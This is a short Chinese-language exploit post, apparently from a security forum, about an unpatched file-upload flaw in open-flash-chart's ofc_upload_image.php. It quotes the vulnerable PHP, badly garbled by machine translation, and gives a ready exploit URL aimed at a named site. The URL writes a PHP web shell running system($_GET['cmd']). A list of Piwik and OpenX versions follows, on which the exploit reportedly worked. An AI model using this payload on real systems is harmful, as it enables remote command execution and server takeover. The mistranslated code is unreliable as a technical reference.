本地测试成功
目前官方还没给出补丁
分析代码:
<?PHP的
/ *这个临时文件,我们将上传的图像文件保存默认路径* / $ default_path ='.. / tmp目录,上传,图像/';
/ *检查是否存在$ default_path变量* / 如果(!file_exists($ default_path)) / *如果属实,使具有写入权限的目录* / mkdir($ default_path,0777,真实);
/ *然后,创建在与上面的文件名称的目录从形式输入“名称”*文件/ / *这个变量的状态并没有删除后再使用* / $目的地= $ default_path。的basename($ _GET这个['名称']);
保存您的图象: '. $destination;
/ *恶意代码在这里,并且攻击者能执行这个代码* / $jfh = fopen ($destination, ‘w’)或(“不能打开文件”); fwrite($ jfh,$ HTTP_RAW_POST_DATA变量); fclose($ jfh);
?>
EXP:http://www.hackqing.cn/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>
测试通过的版本 测试成功 Piwik 0.4.3 Piwik 0.4.2 Piwik 0.4.1 Piwik 0.4 Piwik 0.2.37 Piwik 0.2.36 Piwik 0.2.35 OpenX 2.8.2 OpenX 2.8.6 OpenX 2.8.5 OpenX 2.8.4 OpenX 2.8.3
|